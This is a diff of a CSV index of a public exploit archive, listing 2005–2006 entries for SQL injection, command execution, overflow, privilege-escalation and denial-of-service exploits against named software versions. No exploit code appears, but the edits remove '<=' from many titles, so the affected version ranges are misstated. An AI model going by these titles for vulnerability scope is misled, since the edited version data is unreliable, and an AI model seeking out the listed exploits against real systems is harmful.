Leon",linux,local,0 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0 -1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE <= 9.3 / 10) - Local Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0 +1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3 / 10) - Local Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0 -1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 +1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0 -1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 -1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 -1314,platforms/linux/remote/1314.rb,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 +1312,platforms/php/webapps/1312.php,"Moodle 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 +1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 +1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 -1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 +1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 File Retrieval SQL Injection Exploit",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection Exploit",2005-11-14,rgod,php,webapps,0 -1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - (catid) Remote SQL Injection Vulnerabilities",2005-11-14,Devil-00,php,webapps,0 -1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - (show.php id) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 -1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 -1324,platforms/php/webapps/1324.php,"PHPWebThings <= 1.4 - (msg/forum) SQL Injection Exploit",2005-11-16,rgod,php,webapps,0 -1325,platforms/php/webapps/1325.pl,"PHPWebThings <= 1.4 - (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0 -1326,platforms/php/webapps/1326.pl,"PHP-Nuke <= 7.8 - Search Module Remote SQL Injection Exploit",2005-11-16,anonymous,php,webapps,0 +1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - (catid) SQL Injection Vulnerabilities",2005-11-14,Devil-00,php,webapps,0 +1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - (show.php id) SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 +1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 +1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - (msg/forum) SQL Injection Exploit",2005-11-16,rgod,php,webapps,0 +1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0 +1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 - Search Module SQL Injection Exploit",2005-11-16,anonymous,php,webapps,0 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow PoC",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 -1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 - (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 -1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 - (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 +1330,platforms/windows/remote/1330.c,"FreeFTPD 1.0.8 - (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 +1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit (Metasploit)",2005-11-20,y0,windows,remote,143 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0 -1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 +1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 -1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 - (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 -1340,platforms/php/webapps/1340.php,"eFiction <= 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 +1339,platforms/windows/dos/1339.c,"FreeFTPD 1.0.10 - (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 +1340,platforms/php/webapps/1340.php,"eFiction 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 -1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 +1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 -1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 +1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 -1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 +1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 -1356,platforms/php/webapps/1356.php,"DoceboLms <= 2.0.4 connector.php Shell Upload Exploit",2005-12-04,rgod,php,webapps,0 +1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 connector.php Shell Upload Exploit",2005-12-04,rgod,php,webapps,0 1357,platforms/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow Exploit",2005-12-04,"Kevin Finisterre",windows,remote,0 -1358,platforms/php/webapps/1358.php,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 -1359,platforms/php/webapps/1359.php,"SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0 +1358,platforms/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 +1359,platforms/php/webapps/1359.php,"SugarSuite Open Source 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 -1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 -1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 - (history.dat) Looping PoC",2005-12-07,ZIPLOCK,windows,dos,0 -1363,platforms/php/webapps/1363.php,"Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0 -1364,platforms/php/webapps/1364.c,"SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0 +1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 +1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - (history.dat) Looping PoC",2005-12-07,ZIPLOCK,windows,dos,0 +1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0 +1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0 1365,platforms/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit (Metasploit)",2005-12-08,y0,windows,remote,8080 1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection Exploit (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 -1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D <= 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 -1369,platforms/multiple/remote/1369.html,"Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 +1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 +1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution Exploit",2005-12-12,rgod,php,webapps,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service Exploit",2005-12-14,Kozan,windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 -1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 +1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (Perl)",2005-12-19,kokanin,windows,dos,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 -1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 +1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 -1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21 -1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 -1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 -1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 -1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 -1388,platforms/php/webapps/1388.pl,"phpBB <= 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 +1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21 +1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 +1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 +1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 +1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 +1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll datasrc) Denial of Service",2005-12-27,BuHa,windows,dos,0 -1390,platforms/multiple/dos/1390.c,"BZFlag <= 2.0.4 - (undelimited string) Denial of Service Exploit",2005-12-27,"Luigi Auriemma",multiple,dos,0 +1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service Exploit",2005-12-27,"Luigi Auriemma",multiple,dos,0 1391,platforms/windows/remote/1391.pm,"Windows XP/2003 - Metafile Escape() Code Execution Exploit (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 -1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 +1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 -1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 -1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 +1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 +1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 -1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 -1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart <= 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 +1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 +1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 - (termsh) Local Privilege Escalation Exploit",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (2)",2006-01-04,c0d3r,windows,local,0 -1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 - (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 -1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 - (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 +1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 +1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit",2006-01-07,FistFuXXer,windows,remote,80 -1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit",2006-01-07,FistFuXXer,windows,dos,0 -1410,platforms/php/webapps/1410.pl,"Magic News Plus <= 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 +1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c (GET Request) Denial of Service Exploit",2006-01-07,FistFuXXer,windows,dos,0 +1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service Exploit",2006-01-10,kokanin,hardware,dos,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0 -1413,platforms/windows/remote/1413.c,"eStara Softphone <= 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0 -1414,platforms/windows/remote/1414.pl,"eStara Softphone <= 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060 +1413,platforms/windows/remote/1413.c,"eStara Softphone 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0 +1414,platforms/windows/remote/1414.pl,"eStara Softphone 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060 1415,platforms/linux/local/1415.c,"Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)",2006-01-13,Qnix,linux,local,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 -1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0 -1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 - (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 +1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0 +1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 -1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 - Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 -1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer <= 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 +1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 +1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0 -1425,platforms/linux/local/1425.c,"Xmame <= 0.102 - (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 -1442,platforms/php/webapps/1442.pl,"ezDatabase <= 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 +1425,platforms/linux/local/1425.c,"Xmame 0.102 - (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 +1442,platforms/php/webapps/1442.pl,"ezDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - (-X Option) Local Privilege Escalation Exploit",2006-01-24,"Johnny Mast",linux,local,0 -1446,platforms/php/webapps/1446.pl,"creLoaded <= 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 +1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS",2006-01-25,Pasv,hardware,dos,0 1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow PoC",2006-01-25,"Critical Security",windows,remote,0 1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit",2006-01-25,"rod hedor",linux,local,0 1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2006-01-25,redsand,windows,remote,21 -1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) Remote SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 +1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit",2006-01-26,Argeniss,windows,local,0 -1456,platforms/linux/remote/1456.c,"SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 -1457,platforms/php/webapps/1457.txt,"phpBB <= 2.0.19 - XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 -1458,platforms/windows/remote/1458.cpp,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (0Day)",2006-01-29,ATmaCA,windows,remote,0 +1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 +1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 +1458,platforms/windows/remote/1458.cpp,"Winamp 5.12 - (.pls) Remote Buffer Overflow Exploit (0Day)",2006-01-29,ATmaCA,windows,remote,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 -1460,platforms/windows/remote/1460.pm,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 -1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod <= 1.3 - SQL Injection Exploit",2006-01-31,SkOd,php,webapps,0 +1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - (.pls) Remote Buffer Overflow Exploit (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 +1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection Exploit",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 -1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 -1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 +1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 +1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 Admin Auth Details / SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection Exploit",2006-02-05,SkOd,php,webapps,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit",2006-02-06,bratax,windows,local,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 -1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 - (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 +1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 